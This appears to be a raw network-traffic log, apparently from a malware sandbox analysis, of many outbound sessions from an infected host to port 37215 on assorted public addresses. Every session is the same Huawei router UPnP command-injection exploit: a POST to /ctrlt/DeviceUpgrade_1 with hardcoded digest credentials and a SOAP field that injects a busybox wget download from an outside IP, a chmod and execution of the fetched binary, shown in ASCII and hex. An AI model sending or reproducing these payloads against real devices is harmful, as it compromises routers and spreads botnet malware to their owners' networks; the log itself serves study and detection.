                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              523192.168.2.155679031.34.85.14737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720805883 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              524192.168.2.1555522157.88.49.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720822096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              525192.168.2.1535274121.85.79.17537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720835924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              526192.168.2.153303041.59.242.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720868111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              527192.168.2.1548270197.92.0.1737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720905066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              528192.168.2.1549422197.184.74.8437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720930099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              529192.168.2.153615041.12.74.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720930099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              530192.168.2.153593037.13.180.1337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720930099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              531192.168.2.155289645.254.154.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720941067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              532192.168.2.1558024156.241.74.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720954895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              533192.168.2.153621045.11.234.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720983982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
